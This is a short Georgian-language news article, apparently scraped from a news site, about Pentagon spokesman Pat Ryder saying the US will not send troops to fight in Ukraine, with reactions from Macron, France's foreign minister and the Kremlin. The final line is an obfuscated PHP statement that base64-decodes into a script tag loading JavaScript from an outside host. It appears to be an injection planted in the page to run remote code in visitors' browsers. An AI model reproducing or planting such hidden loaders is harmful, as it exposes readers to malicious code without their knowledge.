celsiusi
ავერსი საქკაბელი

 პენტაგონის სპიკერის განცხადებით, შეერთებული შტატები არ გეგმავს ჯარების გაგზავნას უკრაინაში საბრძოლველად. გენერალ-მაიორმა პატრიკ რაიდერმა განაცხადა, რომ საერთაშორისო ძალისხმევა მოქმედებს, რათა უკრაინამ დახმარება „რაც შეიძლება სწრაფად“ მიიღოს გადაუდებელი საჭიროებების დასაკმაყოფილებლად.

„ჩვენ არ ვგეგმავთ ამერიკელი სამხედროების გაგზავნას უკრაინაში საბრძოლველად. ეს არის ჩვენი პოზიცია. რუსეთის შეჭრის დღიდან ჩვენ ძალიან ბევრს ვმუშაობდით, რათა უკრაინის უსაფრთხოებისთვის დახმარება, რაც შეიძლება სწრაფად მიგვეღო. ეს არ არის მხოლოდ აშშ-ის ძალისხმევა, ეს არის საერთაშორისო ძალისხმევა“, – აღნიშნა გენერალ-მაიორმა, პატრიკ რაიდერმა.

ცნობისთვის, ემანუელ მაკრონმა განაცხადა, რომ უკრაინაში სახმელეთო ძალების გაგზავნის შესაძლებლობის გამორიცხვა შეუძლებელია. მოგვიანებით, საფრანგეთის საგარეო საქმეთა მინისტრმა, სტეფან სეჟურნემ განმარტა, რომ „საფრანგეთს შეუძლია, ჯარების გაგზავნა უკრაინაში კონკრეტული საჭიროებისთვის, მაგრამ არა რუსეთის წინააღმდეგ ომში საბრძოლველად“.

მაკრონის განცხადებას გამოეხმაურნენ კრემლშიც და აღნიშნეს, რომ ასეთი ნაბიჯი ნატო-სა და რუსეთს შორის პირდაპირ კონფლიქტს „გარდაუვალად“ აქცევს.

194
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");